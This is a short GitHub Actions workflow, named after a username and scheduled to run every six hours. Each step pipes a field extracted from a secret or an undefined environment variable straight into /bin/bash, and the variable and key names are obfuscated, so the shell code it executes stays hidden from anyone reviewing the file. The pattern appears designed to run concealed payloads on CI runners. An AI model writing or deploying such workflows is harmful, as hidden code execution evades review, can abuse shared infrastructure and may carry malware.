name: chenfengqiao4567

on:
  workflow_dispatch:
  schedule:
    - cron: '58 5/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: chenfengqiao4567
        env:
          irwpw36: ${{ secrets.irwpw36 }}
        run: |
          echo $irwpw36 | jq -r .hn8 | /bin/bash
          echo $bfnd3 | jq -r .qe36 | /bin/bash
          echo $zti1383 | jq -r .agyiq49572 | /bin/bash
          echo $zzily8 | jq -r .ofgk84 | /bin/bash
          echo $scuny1 | jq -r .iub3 | /bin/bash
          echo $txi6712 | jq -r .xyjz47425 | /bin/bash

